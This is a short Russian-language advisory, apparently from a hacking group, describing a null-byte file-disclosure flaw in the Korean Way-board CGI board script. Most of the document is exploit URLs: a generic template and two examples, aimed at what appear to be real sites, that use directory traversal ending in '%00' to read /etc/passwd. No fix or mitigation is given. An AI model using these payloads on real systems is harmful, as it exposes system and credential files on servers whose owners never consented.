————UkR security team advisory ————

Название: Уязвимость «show file», связанная с перловским багом null bite.

Проблема: Way-board — Это популярная корейская борда (http://way.co.kr — официальный сайт). С помощью этого бага вы сможете просматривать любые файлы, баг работает на любой системе,где perl установлен.»%00″ — символ конца строки, используемый в C, C++ и perl

Использование:
http://www.victim.com/way-board/way-board.cgi?db=урл_до_любого_файла
Пример:
http://www.kuwu.or.kr/way-board/way-board.cgi?db=../../../../../../../../etc/passwd%00

http://hanbando.net/way-board/way-board.cgi?db=../../../../../../../../etc/passwd%00
Автор: UKR-XblP



Оставить мнение